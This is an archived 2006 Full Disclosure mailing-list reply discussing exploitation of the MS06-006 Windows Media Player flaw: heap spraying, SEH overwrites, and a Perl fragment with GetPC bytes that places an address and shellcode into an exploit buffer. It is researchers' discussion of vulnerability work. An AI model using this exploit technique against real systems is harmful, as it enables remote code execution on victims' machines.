Full Disclosure mailing list archives
Re: MS06-0[0]6 Windows Media Player Exploitation [CODE]
From: H D Moore <fdlist () digitaloffense net>
Date: Fri, 17 Feb 2006 08:20:28 -0600
On Friday 17 February 2006 02:05, Matthew Murphy wrote:
Interesting issue with regards to the module-list pointers.
[ snip ]
The heap spray technique works very effectively -- you end up with a *sizable* pad in the 0x04a00000 region which you can use as a direct jump point for the payload, without any of the fancy frame manipulation tricks that I am too tired to try at this hour of the night/morning.
Nice :-)
This should also be (theoretically) version-independent. Thanks to the similarities of the heap management APIs and the fact that most DLLs from MS use high bases, I'd bet money that this works across WMP versions on anything from NT 4.0 to 2003.
I ran into problems with Skylined's alphanumeric GetPC code - on Windows
XP SP2, the SEH GetPC doesn't work from inside another SEH handler (our
shellcode is one, since we smash SEH on the way down). Did some fancy
8086 instructions to get around this (thanks vlad902 - the human
assembler), so, for fwiw:
my $getpc =
"\x58\x58\x58". # pop eax, pop eax, pop eax
"\x05\x18\x29\x29\x29". # add eax,0x29292917
"\x2d\x01\x29\x29\x29". # sub eax,0x29292901
"\x50\x59"; # push eax, pop ecx
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);
It's likely, as well, that this one technique works on any script-enabled browser that supports the plugin with the same results.
I tested my code across Opera/Firefox on 2000/XP/2003 - when I get some more time I will play with the heap spray method and see if that works cross-browser/os/version as well. Looks like heap spray is the way to go, at least for Firefox...
'Nuff teasing. Code attached. It is important to note that you should read the inline disclaimer *BEFORE* using the code.
Thanks for sharing! -HD _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] Matthew Murphy (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)